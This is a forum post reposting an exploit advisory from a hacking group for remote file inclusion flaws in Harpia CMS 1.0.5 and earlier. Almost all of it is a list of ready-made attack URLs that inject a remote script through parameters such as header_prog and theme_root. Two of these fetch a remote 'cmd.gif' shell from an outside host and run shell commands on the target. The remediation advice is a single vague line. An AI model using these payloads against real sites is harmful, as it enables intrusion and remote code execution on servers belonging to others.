Jump to content
Guest Nemessis

[RST] Harpia CMS <= 1.0.5 RFI

Recommended Posts

Guest Nemessis
Posted

---------------------------------------------------------------------------

Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Harpia

version : LATEST VERSION 1.0.5

URL : http://sourceforge.net/projects/harpia

------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls

http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls

http://www.site.com/missing.php?header_prog=[Evil_Script]

http://www.site.com/_inc/footer.php?theme_root=[Evil_Script]

http://www.site.com/_inc/header.php?mod_root=[Evil_Script]

http://www.site.com/_inc/header.php?theme_root=[Evil_Script]

http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script]

http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script]

http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script]

http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script]

http://www.site.com/_mods/email.php?header_prog=[Evil_Script]

http://www.site.com/_mods/files.php?header_prog=[Evil_Script]

http://www.site.com/_mods/files.php?footer_prog=[Evil_Script]

http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script]

http://www.site.com/_mods/search.php?header_prog=[Evil_Script]

http://www.site.com/_mods/topics.php?header_prog=[Evil_Script]

http://www.site.com/_mods/users.php?header_prog=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~

declare variabels

---------------------------------------------------------------------------

Shoutz:

~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://rstcenter.com ]

------------------------------- [ EOF] ----------------------------------

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...